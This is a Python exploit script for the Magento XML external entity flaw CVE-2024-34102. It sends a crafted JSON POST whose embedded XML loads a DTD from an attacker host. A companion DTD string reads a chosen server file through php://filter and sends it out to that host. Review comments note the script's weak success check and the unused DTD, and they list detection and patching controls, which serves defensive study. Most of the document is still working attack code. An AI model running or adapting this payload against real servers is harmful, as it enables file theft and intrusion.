import requests
import argparse
def exploit(target_url, target_file, exfil_url):
    """Send one POST shaped like the CVE-2024-34102 proof of concept and print the outcome.

    The JSON body nests a ``sourceData`` object whose ``data`` field is an XML
    document that declares an external DTD. Nothing is returned; the function
    only prints a status line.

    Args:
        target_url: Base URL that the REST route is appended to.
        target_file: Path interpolated into the locally built DTD text.
        exfil_url: Host interpolated after ``http://`` in the XML document
            and in the DTD text.

    Review notes:
        * The only thing checked is ``status_code == 200``. That shows the
          endpoint accepted the request, not that an external entity was
          resolved, so the "[+]" line is not evidence that a host is
          vulnerable, and a non-200 is not evidence that it is patched.
        * No ``timeout`` is passed to ``requests.post``, so the call can block
          for as long as the server keeps the connection open.
        * On the wire the request is distinctive: a JSON POST to a guest-cart
          ``estimate-shipping-methods`` route whose body carries a
          ``sourceData`` key and a ``<!DOCTYPE``. Request logging or WAF rules
          on that combination, egress filtering on the application server,
          and the vendor fix for the CVE are the matching controls.
    """
    request_headers = {
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "X-Requested-With": "XMLHttpRequest",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36",
        "Content-Type": "application/json"
    }

    # XML document embedded as a string in the JSON body; it references an
    # external DTD over plain HTTP.
    xml_document = f"""<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://{exfil_url}/dtd.xml"> %sp; %param1; ]> <r>&exfil;</r>"""

    # NOTE(review): 16 is sent as a parser option value; its meaning is defined
    # server-side (presumably a libxml flag) - confirm.
    source_data = {"data": xml_document, "options": 16}
    body = {
        "address": {
            "totalsReader": {
                "collectorList": {"totalCollector": {"sourceData": source_data}}
            }
        }
    }

    # Built but never referenced again in this function: the script neither
    # sends nor stores this text.
    external_dtd = f"""
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource={target_file}">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://{exfil_url}?%data;'>">
"""

    try:
        endpoint = f"{target_url}/rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods"
        reply = requests.post(endpoint, headers=request_headers, json=body)
        if reply.status_code != 200:
            print(f"[-] Failed to send payload. HTTP Status Code: {reply.status_code}")
        else:
            # Reached on any HTTP 200, whatever the server did with the body.
            print(f"[+] Payload sent successfully to {target_url}. Check {exfil_url} for exfiltrated data.")
    except Exception as err:
        # Broad catch kept from the original: any failure is printed, not raised.
        print(f"[-] Error occurred: {err}")
if __name__ == "__main__":
    # Command-line entry point: three mandatory options, passed straight to
    # exploit() with no validation of their values.
    cli = argparse.ArgumentParser(description="Exploit CVE-2024-34102 in Magento")
    for flag, help_text in (
        ("--target-url", "Target Magento URL"),
        ("--target-file", "File to exfiltrate from the target"),
        ("--exfil-url", "URL to receive exfiltrated data"),
    ):
        cli.add_argument(flag, required=True, help=help_text)
    opts = cli.parse_args()
    exploit(opts.target_url, opts.target_file, opts.exfil_url)